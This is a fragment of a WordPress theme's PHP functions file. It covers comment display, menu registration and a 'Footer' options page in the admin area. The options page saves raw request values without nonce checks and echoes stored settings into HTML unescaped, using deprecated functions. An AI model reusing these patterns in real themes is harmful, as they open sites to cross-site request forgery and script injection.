		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
